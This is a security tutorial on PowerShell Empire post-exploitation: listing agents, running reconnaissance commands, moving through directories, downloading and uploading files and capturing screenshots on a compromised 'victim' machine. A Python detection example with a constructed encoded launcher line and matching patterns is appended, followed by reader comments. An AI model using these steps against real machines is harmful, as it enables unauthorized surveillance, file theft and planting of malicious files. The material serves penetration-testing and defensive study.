Powershell Empire Stagers 2: Controlling the Victim’s Machine

June 10, 2016 | Views: 21775


Hello fellow Cybrarians,

In the last tutorial, Powershell Empire Stagers 1: Phishing with an Office Macro and Evading AVs, we covered creating a malicious macro and sending it to the victim.

Today, we’re going to learn how to move around the system, once the connection is made, and gather some information about the target.

Terminology

Before we go deeper in the world of PowerShell Empire, let’s clarify some common terminology:

1- Stager: a payload executed on the target's machine in order to establish a connection between the attacker's machine and the target's machine.

2- Agent: the target's machine that we are controlling (Empire gives each one a name).

Tutorial Requirements

1- Empire installed on Kali Linux (see Part 1)

2- Another machine to emulate the target's machine (Mac or Windows OS)

Let's begin…

Step 1: Get the Connection

When the victim opens the file, you should get a connection back, in the form of a green message saying "Initial agent [name of the agent] now active".

em1.PNG

Step 2: Show Agent’s Information

Type agents to get the name of the agent, along with some basic information about the compromised system.

em2.PNG

In the image above, we can see the victim's internal IP address, the name of his machine, and when the file was opened.

Step 3: Interact with the System

Type help to view all the options that come with the agent menu:

>>> help

At this point, we're only interested in interacting with the system.

em4.PNG

To interact with the system, type:

>>> interact NameOfTheMachine

em5.PNG

Step 4: Control the Machine

We can control the hacked machine through a variety of commands. Here are 7 important commands for this mission:

1- sysinfo: gets information about the system (the type of operating system, the process ID and the IP address). In this case, it's an internal IP.

em6.PNG

2- ipconfig: gets the network configuration, including the default gateway, which helps in hacking the wireless or wired connection. By checking the gateway's IP address in your browser, you know what type of router the victim is using.

em9.PNG

3- tasklist: lists all the running programs and services on the machine.

ta.JPG

4- ps: displays information about a selection of the active processes on the system. It can be VERY helpful in customizing specific attacks for persistence.

em10.PNG

5- pwd: shows the path of the current directory.

em11.PNG

You can switch to a user's directory by typing:

>>> cd C:\Windows\Users

>>> cd Desktop

em12.PNG

em13.PNG

em14.PNG

6- Download or Upload Files

One of the great things about Empire is that you can download files from the hacked system or upload files to it (this can be used to replace clean files with malicious ones, as with social engineering efforts).

To download, type:

>>> download NameOfTheFile.doc

  • Note: the file extension is important.

em16.PNG

The file will be saved in the Empire directory under Downloads.

em17.PNG

We can also upload files to the victim's machine.

To upload, type:

>>> upload NameOfFile

7- Screenshot

We can take a screenshot of the system desktop by typing:

>>> usemodule collection/screenshot

>>> execute

em18.PNG

Once the command is executed, it will take some time to finish the process.

em20.PNG

Once the screenshot is taken, the picture will be saved under the Empire/Downloads/Screenshot directory.

1.JPG

As you can see, PowerShell Empire is a very powerful tool for gathering information about the target. It's a very stealthy and helpful way for a hacker/pentester to customize specific attacks in order to gain a foothold on the network.

That's all for this tutorial. Stay tuned for more interesting topics, and thank you for reading.
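Stealthy as the session is from the victim's point of view, the steps above leave host-side traces a defender can look for: an Office application spawning PowerShell (the macro stager from Part 1), a PowerShell launcher line with a hidden window and an encoded command, that PowerShell process connecting out to the listener (Step 1), and PowerShell spawning recon utilities such as tasklist (Step 4). The following is an added example, not code from the tutorial or from the Empire project: it runs those checks over a few constructed Sysmon-style records; the record format, the process IDs, the base64 placeholder and the 192.0.2.10 listener address are all made up for the example.

```python
"""Added example (not from the tutorial or the Empire project): flag host-side
traces of an Empire agent delivered by an Office macro, over constructed records."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RECON_TOOLS = {"tasklist.exe", "ipconfig.exe", "whoami.exe", "net.exe"}
# Switches Empire's default launcher line uses: no profile, hidden window, encoded command.
LAUNCHER_FLAGS = re.compile(
    r"-(nop|noprofile|enc|encodedcommand|ep\s+bypass|w(?:indowstyle)?\s+(?:1|hidden))\b", re.I)

# Constructed sample telemetry, one '|'-separated Key=Value record per line (not real logs);
# the base64 after -enc is a placeholder, not a real stager.
SAMPLE_LOG = r"""
EventID=1|ProcessId=4120|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|ParentImage=C:\Windows\explorer.exe|CommandLine="WINWORD.EXE" invoice.doc
EventID=1|ProcessId=5244|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=powershell -noP -sta -w 1 -enc QUFBQUFBQUFB
EventID=3|ProcessId=5244|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|DestinationIp=192.0.2.10|DestinationPort=80
EventID=1|ProcessId=6010|Image=C:\Windows\System32\tasklist.exe|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=tasklist
EventID=1|ProcessId=7001|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell
""".strip().splitlines()

def parse_record(line):
    """Split 'Key=Value|Key=Value' into a dict; a value may itself contain spaces."""
    return dict(part.split("=", 1) for part in line.split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze(lines):
    """Return (rule, ProcessId) findings. An admin's interactive PowerShell is not flagged."""
    findings = []
    for rec in map(parse_record, lines):
        image, pid = basename(rec["Image"]), rec["ProcessId"]
        if rec["EventID"] == "1":
            parent = basename(rec["ParentImage"])
            if parent in OFFICE_APPS and image == "powershell.exe":
                findings.append(("office_spawned_powershell", pid))   # the macro stager (Part 1)
            if image == "powershell.exe" and LAUNCHER_FLAGS.search(rec.get("CommandLine", "")):
                findings.append(("stager_launcher_flags", pid))
            if parent == "powershell.exe" and image in RECON_TOOLS:
                findings.append(("recon_tool_from_powershell", pid))  # e.g. the tutorial's tasklist
        elif rec["EventID"] == "3" and image == "powershell.exe":
            findings.append(("powershell_network_connection", pid))   # the agent calling back
    return findings

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_LOG):
        print(rule, pid)
```

Only the process-creation and network-connection records are checked here; Empire's built-in commands such as sysinfo and pwd run inside the agent's PowerShell process and leave no child process, so script block logging is the complementary source for those.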

@Z33MAXX

18 Comments
  1. I was wondering, if you upload a file to the victim test machine's desktop,
    how do you remotely execute the uploaded file?

  2. VERY GOOD..
    GREETINGS FROM VENEZUELA

  3. Cool article, very helpful. I am using this to try and push for some user security training for our staff, as it looks like the only way to stop this is for you to recognize the phishing attempt.

    • James, also look at KnowBe4 security training – very in depth and does what you are looking for – it is subscription based, so you can tailor an exercise to meet your needs on an ongoing basis instead of just fire and forget like most people do when they “learn” their once a year training, if that.
